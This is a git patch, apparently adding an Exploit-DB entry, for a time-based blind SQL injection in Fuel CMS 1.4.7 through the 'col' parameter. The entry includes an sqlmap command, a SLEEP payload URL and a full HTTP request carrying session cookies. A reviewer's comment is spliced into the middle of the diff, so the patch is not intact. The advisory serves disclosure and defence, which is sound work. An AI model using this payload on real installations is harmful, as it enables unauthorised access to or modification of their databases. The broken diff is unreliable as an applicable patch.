From eea08c4481e74b4a79c5967253f337567896500b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 12 Aug 2020 05:01:48 +0000
Subject: [PATCH] DB: 2020-08-12

1 changes to exploits/shellcodes

Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
---
 exploits/php/webapps/48741.txt | 58 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 59 insertions(+)
 create mode 100644 exploits/php/webapps/48741.txt

diff --git a/exploits/php/webapps/48741.txt b/exploits/php/webapps/48741.txt
new file mode 100644
index 000000000..01afb47f3
--- /dev/null
+++ b/exploits/php/webapps/48741.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)
+# Google Dork: -
+# Date: 2020-08-01
+# Exploit Author: Roel van Beurden
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip
+# Version: 1.4.7
+# Tested on: Linux Ubuntu 18.04
+# CVE: CVE-2020-17463
+
+
+1. Description:
+----------------------
+
+Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from one of the affected pages with 'col' parameter and save it like fuel.req
+Then run SQLmap to extract the data from the database:
+
+sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent
+
+
+3. Example payload:
+----------------------
+
+(time-based blind)
+
+/fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0
+
+
+4. Burpsuite request:
+----------------------
+
+GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1
+
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+
+Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529
+
+Upgrade-Insecure-Requests: 1
+
+
+5. Timeline:
+----------------------
+
+2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7
+2020-08-02: Reported vulnerability to vendor
+2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f0fd2c726..523a166ec 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
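Review bot: The `Cookie:` line in section 4 reproduces the author's `ci_session` token and both serialized `fuel_*` session cookies verbatim; session identifiers are credentials and advisories conventionally replace them with a placeholder such as `Cookie: ci_session=<redacted>; fuel_<hash>=<redacted>; fuel_ui_<hash>=<redacted>`, since the request is just as reproducible without them. The remediation is only implied by the last Timeline entry, so a line directly under the `# CVE:` header, e.g. `# Fixed in: 1.4.8 (vendor patch, 2020-08-11)`, would let defenders triage without reading to the bottom. The title says "Authenticated" but the Description does not state which account level is required; the affected `*/items` routes appear to be backend listing pages, so presumably an administrative login is needed — this should be stated explicitly rather than left for the reader to infer from the cookie contents.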
@@ -42982,3 +42982,4 @@ id,file,description,date,author,type,platform,port
 48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,
 48738,exploits/php/webapps/48738.txt,"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)",2020-08-10,boku,webapps,php,
 48739,exploits/java/webapps/48739.txt,"ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)",2020-08-10,"Bhadresh Patel",webapps,java,
+48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,